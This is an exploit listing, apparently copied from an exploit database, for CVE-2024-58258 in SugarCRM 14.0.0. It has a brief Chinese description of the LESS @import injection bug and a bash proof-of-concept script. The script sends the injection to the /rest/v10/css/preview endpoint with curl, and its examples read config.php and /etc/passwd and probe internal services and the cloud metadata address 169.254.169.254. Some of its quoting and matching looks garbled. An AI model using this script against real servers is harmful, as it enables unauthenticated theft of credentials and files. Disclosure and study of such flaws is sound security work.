Exploit for SugarCRM 14.0.0 - SSRF/Code Injection CVE-2024-58258

2025-07-16 | CVSS 7.2

https://sploitus.com/exploit?id=EDB-ID:52365

Exploit Title : SugarCRM 14.0.0 - SSRF/Code Injection

Author: Egidio Romano aka EgiX

Email : n0b0d13s@gmail.com

Software Link: https://www.sugarcrm.com

Affected Versions: All commercial versions before 13.0.4 and 14.0.1.

CVE Reference: CVE-2024-58258

Vulnerability Description:

通过GET参数传递给/css/preview REST API端点的用户输入在解析为LESS代码之前未经过适当清理。远程未经身份验证的攻击者可以利用此漏洞注入并执行任意LESS指令。通过滥用@import LESS语句，攻击者可以触发服务器端请求伪造（SSRF）或读取Web服务器上的任意本地文件，可能导致敏感信息泄露。

Proof of Concept:

#!/bin/bash

echo echo “+———————————————————————-+”; echo “| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |”; echo “+———————————————————————-+”;

if [ “$#” -ne 2 ]; then echo -ne “\nUsage…..: $0 \n” echo -ne “\nExample…: $0 ‘http://localhost/sugarcrm/’ ‘config.php’” echo -ne “\nExample…: $0 ‘http://localhost/sugarcrm/’ ‘/etc/passwd’” echo -ne “\nExample…: $0 ‘https://www.sugarcrm.com/' ‘http://localhost:9200/_search’” echo -ne “\nExample…: $0 ‘https://www.sugarcrm.com/' ‘http://169.254.169.254/latest/meta-data/’\n\n” exit 1 fi

urlencode() { echo -n “$1” | xxd -p | tr -d ‘\n’ | sed ’s/../%&/g’ }

INJECTION=$(urlencode “1; @import (inline) ‘$2’; @import (inline) ‘data:text/plain,________’;//”) RESPONSE=$(curl -ks “${1}rest/v10/css/preview?baseUrl=1&param=${INJECTION}”)

if echo “$RESPONSE” | grep -q “”; then echo -e “\nOutput for ‘$2’:\n” echo “$RESPONSE” | sed ‘//q’ | grep -v ‘________’ echo else echo -e “\nError: exploit failed!\n” exit 2 fi

Credits: Vulnerability discovered by Egidio Romano.

Original Advisory: http://karmainsecurity.com/KIS-2025-04

Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/